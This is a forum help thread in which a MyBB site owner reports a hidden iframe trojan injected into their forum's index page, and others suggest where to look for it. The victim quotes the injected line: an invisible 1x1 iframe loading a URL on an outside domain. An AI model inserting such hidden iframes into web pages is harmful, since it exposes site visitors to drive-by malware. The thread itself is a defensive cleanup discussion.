MyBB Community Forums

Full Version: Iframe trojan - help
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Hi. Yesterday my Kaspersky showed me a trojan when i was on my forum. I checked source of index page and I've forund this at the beggining:

<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>

Screen:
[Image: xyvwj.jpg]

There was the same code at the end of index page. I've checked all index.html and index.php files and i deleted all iframe code. But it disappeared only at the end of source. It still is at the beggining. I don't know what to do. Any help?
go to templates ---> your theme and look at the header templates seems to be coming from there...

if not ... ungrounded templates ---> headerinclude

whats the theme you are using maybe it was included with that ?
I'm using Afresh Midnight. Both templates - header and ungrounded are clean. There is not Iframe Code.

In screen i've posted it looks like code is somewhere in index before <html> tag. But in index.php there is no iframe tag.
The fact that it is above even the <html> tag is a bit odd. Do a template search for 'iframe' and if it isn't in templates, ask your host...
No templates were found containing the string 'iframe'. So it appears that i have to ask my host provider what's going on Sad
can i have a link to your board ??
That fact that it's mentioning 'income' is a bit odd too...
seems to be some sort of ad related thing eh matt ??
I went to the site and it's definitely suspicious ... but I don't know exactly what effect it would have.
lol brad rather daring id say !!
Pages: 1 2 3